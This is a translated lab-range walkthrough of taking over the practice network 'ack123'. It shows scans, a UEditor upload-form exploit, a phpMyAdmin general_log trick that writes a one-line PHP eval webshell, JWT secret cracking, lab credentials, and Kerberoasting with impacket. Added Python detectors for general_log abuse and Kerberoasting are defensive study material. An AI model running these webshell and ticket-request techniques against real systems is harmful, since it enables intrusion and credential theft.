From External Foothold to Internal Domain: the ack123 Lab Range
forg12

Lab range description

Lab range topology


PS: the author of this lab range is 暗月.

HOSTS configuration

cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
# 9-ack123
192.168.0.207 www.ackmoon.com


WEB1 server

Information gathering

Port scan

sudo nmap -sT -sV -O 192.168.0.207 -p-
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for www.ackmoon.com (192.168.0.207)
Host is up (0.0048s latency).
Not shown: 65517 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
999/tcp open http Microsoft IIS httpd 8.5
3306/tcp open mysql MySQL (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6588/tcp open http Microsoft IIS httpd 8.5
10136/tcp open unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:10:B5:76 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2012|8.1
OS CPE: cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_2012 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.32 seconds

Directory enumeration

dirsearch -u "http://www.ackmoon.com" -e php,htm,js,bak,zip,tar.gz,tgz,txt -r -R 1 -i 200-399

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, htm, js, bak, zip, tar.gz, tgz, txt | HTTP method: GET | Threads: 30 | Wordlist size: 12472

Output File: /home/kali/.dirsearch/reports/www.ackmoon.com.txt

Error Log: /home/kali/.dirsearch/logs/errors.log

Target: http://www.ackmoon.com/

[19:47:06] Starting:
[19:47:11] 301 - 149B - /js -> http://www.ackmoon.com/js/ (Added to queue)
[19:47:57] 301 - 152B - /ADMIN -> http://www.ackmoon.com/ADMIN/ (Added to queue)
[19:47:58] 301 - 152B - /Admin -> http://www.ackmoon.com/Admin/ (Added to queue)
[19:48:15] 301 - 157B - /WebService -> http://www.ackmoon.com/WebService/ (Added to queue)
[19:48:39] 301 - 152B - /admin -> http://www.ackmoon.com/admin/ (Added to queue)
[19:49:00] 302 - 134B - /admin/?/login -> /admin/login.aspx
[19:50:04] 301 - 150B - /api -> http://www.ackmoon.com/api/ (Added to queue)
[19:50:45] 301 - 155B - /database -> http://www.ackmoon.com/database/ (Added to queue)
[19:51:06] 200 - 17KB - /favicon.ico
[19:51:22] 301 - 153B - /images -> http://www.ackmoon.com/images/ (Added to queue)
[19:52:05] 301 - 148B - /m -> http://www.ackmoon.com/m/ (Added to queue)
[19:52:17] 301 - 153B - /member -> http://www.ackmoon.com/member/ (Added to queue)
[19:52:18] 200 - 1B - /member/
[19:53:20] 301 - 155B - /template -> http://www.ackmoon.com/template/ (Added to queue)
[19:53:38] Starting: js/
[19:55:28] 301 - 154B - /js/code -> http://www.ackmoon.com/js/code/
[19:58:22] Starting: ADMIN/
[20:03:27] 301 - 159B - /ADMIN/images -> http://www.ackmoon.com/ADMIN/images/
[20:03:46] 301 - 157B - /ADMIN/lang -> http://www.ackmoon.com/ADMIN/lang/
[20:05:44] 301 - 159B - /ADMIN/themes -> http://www.ackmoon.com/ADMIN/themes/
[20:06:12] Starting: Admin/
[20:11:02] 301 - 159B - /Admin/images -> http://www.ackmoon.com/Admin/images/
[20:11:14] 301 - 157B - /Admin/lang -> http://www.ackmoon.com/Admin/lang/
[20:13:09] 301 - 159B - /Admin/themes -> http://www.ackmoon.com/Admin/themes/
[20:13:48] Starting: WebService/
[20:20:32] Starting: admin/
[20:24:04] 301 - 159B - /admin/images -> http://www.ackmoon.com/admin/images/
[20:24:14] 301 - 157B - /admin/lang -> http://www.ackmoon.com/admin/lang/
[20:25:45] 301 - 159B - /admin/themes -> http://www.ackmoon.com/admin/themes/
[20:26:17] Starting: api/
[20:32:36] Starting: database/
[20:38:31] Starting: images/
[20:44:33] Starting: m/
[20:46:37] 301 - 155B - /m/images -> http://www.ackmoon.com/m/images/
[20:47:26] Starting: member/
[20:48:40] 301 - 160B - /member/images -> http://www.ackmoon.com/member/images/
[20:49:30] Starting: template/
[20:49:54] 301 - 159B - /template/aaa -> http://www.ackmoon.com/template/aaa/

Task Completed

Vulnerability testing

After registering a user and logging in, sensitive information such as the components the site uses is visible.


Search for UEditor 1.4.3 vulnerabilities.


Locating the ueditor path:


Modify the upload address in the HTML file.

<form action="http://www.ackmoon.com/admin/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>


After the Behinder (冰蝎) session comes up, execute commands:


Privilege escalation

Use Behinder's reverse shell to bring the host into CS (Cobalt Strike); SpoolSystem Injection gets SYSTEM privileges.


DATA1 server

Host discovery from CS:

portscan 10.10.11.0-10.10.11.255 1-1024,3389,5000-6000 arp 1024


Looking at the website configuration file, the site's database server is 10.10.11.137:

key="HdhCmsConnStr" value="user id=sa;password=pass123@.com;initial catalog=DemoHdhCms;data source=10.10.11.137"

Create a SOCKS4 proxy on the first machine and connect through it with Multiple.Database.Utilization.Tools.


Bring the host into CS; SpoolSystem Injection gets SYSTEM privileges.


WEB2 server

Information gathering

Nmap scan report for 10.10.11.135
Host is up (1.1s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
|_http-title: \xE6\xBC\x94\xE7\xA4\xBA\xEF\xBC\x9AJWT\xE5\xAE\x9E\xE6\x88\x98\xEF\xBC\x9A\xE4\xBD\xBF\xE7\x94\xA8axios+PHP\xE5\xAE\x9E\xE7\x8E\xB0\xE7\x99\xBB\xE5\xBD\x95\xE8\xAE\xA4\xE8\xAF\x81
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: ACK123
| NetBIOS_Domain_Name: ACK123
| NetBIOS_Computer_Name: 12SERVER-WEB2
| DNS_Domain_Name: ack123.com
| DNS_Computer_Name: 12server-web2.ack123.com
| DNS_Tree_Name: ack123.com
| Product_Version: 6.3.9600
|_ System_Time: 2024-01-20T06:00:26+00:00
|_ssl-date: 2024-01-20T06:00:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=12server-web2.ack123.com
| Not valid before: 2024-01-18T07:54:23
|_Not valid after: 2024-07-19T07:54:23
4444/tcp open krb524?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 302:
|_ Message signing enabled but not required
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-01-20T06:00:30
|_ start_date: 2024-01-19T07:54:16

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1378.94 seconds

JWT key brute-force:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC8xMC4xMC4xLjEzNSIsImF1ZCI6Imh0dHA6XC9cLzEwLjEwLjEuMTM1IiwiaWF0IjoxNzA1NzI5NDU0LCJuYmYiOjE3MDU3Mjk0NjQsImV4cCI6MTcwNTczMDA1NCwiZGF0YSI6eyJ1c2VyaWQiOjEsInVzZXJuYW1lIjoiZGVtbyJ9fQ.ncRTbMWg-_t5CEinpHJQOKhWeyp1jtjTXTmJ6_xBjpE:Qweasdzxc5


The Apache version string on port 80 suggests phpStudy; enumerate whether some version of phpMyAdmin is present:

proxychains wfuzz -w world1 -w world2 -w world3 --ss 200 http://10.10.11.135/phpmyadminFUZZ.FUZ2Z.FUZ3Z/


Logging in with the key cracked from the JWT, Qweasdzxc5, succeeds.


Write a one-line webshell via phpMyAdmin:

set global general_log = "ON";
set global general_log_file = "c:/phpstudy_pro/www/x.php";
select '<?php eval($_REQUEST[cmd]);?>';
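An added detection example, not from the original write-up: it audits captured SQL statements and the live general_log variables for the pattern above (general_log_file redirected into a web root, followed by a query whose text is PHP). The web roots list and the sample statements are constructed; only the c:/phpstudy_pro/www path and the payload come from the block above.

```python
"""Flag MySQL general_log abuse: a log file inside the web root plus a query whose
text is PHP, so the server itself writes a .php file that the web server executes."""
import re

# Assumed web roots for this check; the lab's phpStudy root appears above.
WEB_ROOTS = ["c:/phpstudy_pro/www", "/var/www/html"]
SCRIPT_EXT = {".php", ".phtml", ".asp", ".aspx", ".jsp"}
_SET_LOGFILE = re.compile(
    r"set\s+(?:global\s+)?general_log_file\s*=\s*['\"]([^'\"]+)['\"]", re.I)
_PHP_TAG = re.compile(r"<\?php|<\?=", re.I)

def _norm(path):
    return path.replace("\\", "/").lower().rstrip("/")

def risky_log_path(path, web_roots=WEB_ROOTS):
    """True if the log lands under a web root or carries a script extension."""
    p = _norm(path)
    name = p.rsplit("/", 1)[-1]
    ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
    return any(p.startswith(_norm(r) + "/") for r in web_roots) or ext in SCRIPT_EXT

def audit_statements(statements, web_roots=WEB_ROOTS):
    """Return (index, reason) for each suspicious statement, in order."""
    findings = []
    for i, stmt in enumerate(statements):
        m = _SET_LOGFILE.search(stmt)
        if m and risky_log_path(m.group(1), web_roots):
            findings.append((i, f"general_log_file redirected to {m.group(1)}"))
        elif _PHP_TAG.search(stmt):
            findings.append((i, "query text contains a PHP open tag"))
    return findings

def check_variables(rows, web_roots=WEB_ROOTS):
    """rows: (Variable_name, Value) pairs from SHOW VARIABLES LIKE 'general_log%'."""
    v = {k.lower(): val for k, val in rows}
    return (v.get("general_log", "OFF").upper() == "ON"
            and risky_log_path(v.get("general_log_file", ""), web_roots))

# Constructed sample input (not captured from the lab).
SAMPLE_STATEMENTS = [
    "SELECT id, name FROM users WHERE id = 7",
    'set global general_log = "ON";',
    'set global general_log_file = "c:/phpstudy_pro/www/x.php";',
    "select '<?php eval($_REQUEST[cmd]);?>';",
    "SET GLOBAL general_log_file = '/var/log/mysql/query.log';",
]
SAMPLE_VARIABLES = [("general_log", "ON"), ("general_log_file", r"C:\phpstudy_pro\www\x.php")]

if __name__ == "__main__":
    print(audit_statements(SAMPLE_STATEMENTS), check_variables(SAMPLE_VARIABLES))
```

The second check matters because an attacker can disable general_log again afterwards; the planted file stays in the web root, so the path should also be compared against the web server's actual document root on the host.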


Already SYSTEM privileges; bring the host straight into CS.


Domain controller

Information gathering

After taking WEB2, another network segment is visible.


The process list shows a process running as a domain user; after injecting into that process, collect domain information.


Locating the domain controller:


Query the SPNs registered to domain user accounts:


Kerberoasting

Request service tickets for all user SPNs:

proxychains python ../impacket-0.10.0/examples/GetUserSPNs.py -request -dc-ip 10.10.12.135 ack123.com/web2 -hashes :85b998a3d8f1904bc6f2d6b5f418be7e -outputfile hash.txt 


Cracking with Hashcat:


With the password in hand, bring the host into CS:

P@55w0rd!
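As an added defender-side example (not part of the original write-up), the following Python flags the kind of GetUserSPNs.py -request burst used in this section in Windows Security Event 4769 data. The event records, service names and timestamps are constructed; only the requesting account, web2 in ACK123.COM, is taken from the lab.

```python
"""Detect Kerberoasting-style ticket bursts in Windows Security Event 4769 data.
A GetUserSPNs.py -request run produces many 4769 events from one account within
seconds, usually with TicketEncryptionType 0x17 (RC4-HMAC), the cipher that makes
the service ticket crackable offline. Computer accounts and krbtgt are ignored."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType value for RC4-HMAC in event 4769

# Constructed sample events (not taken from the lab); keys mirror 4769 fields.
SAMPLE_EVENTS = [
    {"time": "2024-01-20T06:10:01", "account": "web2@ACK123.COM", "service": "sqlsvc", "etype": 0x17, "status": "0x0"},
    {"time": "2024-01-20T06:10:01", "account": "web2@ACK123.COM", "service": "iis_svc", "etype": 0x17, "status": "0x0"},
    {"time": "2024-01-20T06:10:02", "account": "web2@ACK123.COM", "service": "backup_svc", "etype": 0x17, "status": "0x0"},
    {"time": "2024-01-20T06:10:02", "account": "web2@ACK123.COM", "service": "12SERVER-WEB2$", "etype": 0x17, "status": "0x0"},
    {"time": "2024-01-20T06:12:40", "account": "alice@ACK123.COM", "service": "sqlsvc", "etype": 0x12, "status": "0x0"},
    {"time": "2024-01-20T06:13:05", "account": "bob@ACK123.COM", "service": "krbtgt", "etype": 0x12, "status": "0x0"},
]

def is_roastable_request(ev):
    """Successful TGS request for a user-owned SPN issued with RC4."""
    svc = ev["service"]
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return ev["etype"] == RC4_HMAC and ev["status"] == "0x0"

def detect_kerberoast(events, window=timedelta(seconds=60), min_services=3):
    """Map requesting account -> sorted SPNs for accounts that requested RC4
    tickets for at least min_services distinct user SPNs within one window."""
    per_account = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            per_account[ev["account"]].append(
                (datetime.fromisoformat(ev["time"]), ev["service"]))
    findings = {}
    for account, reqs in per_account.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window from each request
            in_window = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(in_window) >= min_services:
                findings[account] = sorted(in_window)
                break
    return findings

if __name__ == "__main__":
    for acct, spns in detect_kerberoast(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {acct}: {', '.join(spns)}")
```

On a real domain controller the thresholds need tuning against baseline 4769 volume, and moving service accounts to AES-only (msDS-SupportedEncryptionTypes) plus long random passwords or gMSAs removes the RC4 downgrade this detection relies on.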


DATA2 server

Using the domain controller privileges, bring the DATA2 server directly into CS:


All machines online:
